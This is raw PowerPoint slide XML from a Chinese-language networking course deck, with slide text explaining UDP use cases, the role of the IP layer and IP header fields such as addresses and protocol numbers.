            <a:ext cx="6264696" cy="3539430"/>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sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>当丢失一些应用程序数据对于用户来说不重要时（例如音频通信、视频等），可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议。因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是无连接的，它的开销和延迟比</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>小，一个主机只需要送出数据就行，无需初步的协商。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>也用在应用程序为确保可靠传递数据负责的场合，例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，以及本来用于局域网的场合，例如动态主机配置协议（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DHCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SNMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议类似，每一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据包也包含一个源端口和一个目标端口。虽然</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>号与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>端口号类似，但二者不同，而且不能互换。一些协议（例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）能同时使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>端口，并且端口号还能相同，但这并不是必须的。</a:t>
            </a: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6.2.3 IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>层</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1403648" y="1175000"/>
            <a:ext cx="6264696" cy="2662267"/>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sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>层</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>OSI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>参考模型的网络层相对应，网络层解决了计算机到计算机通信的问题。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议族在该层的协议主要有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议（网络互联协议）、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议（网间控制报文协议）等。这一层负责为从传输层接收的数据进行寻址和路由。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>头包含一个称为“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>版本”的域，用来说明使用哪一个版本的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议。目前使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IPv4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，那么这一域的值为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，当然</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IPv6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的使用也越来越多。</a:t>
            </a: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6.2.3 IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>层</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="467544" y="1203598"/>
            <a:ext cx="8064896" cy="1600438"/>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zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>其它重要的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>头还有这样一些域：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>．源和目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址：例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>10.3.1.10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IPv4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1000:0:0:2F:8A:400:0427:9BD1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IPv6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>．</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议数：指示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>载荷中包含的传输层协议类型。例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>17</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>50</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ESP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a: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619293" y="1337721"/>
            <a:ext cx="2034540" cy="156845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rPr>
              <a:t>6.1</a:t>
            </a:r>
            <a:endPar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614" y="2115293"/>
            <a:ext cx="1781944"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3653820" y="2114658"/>
            <a:ext cx="5655280" cy="7258"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="95250" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="003466"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
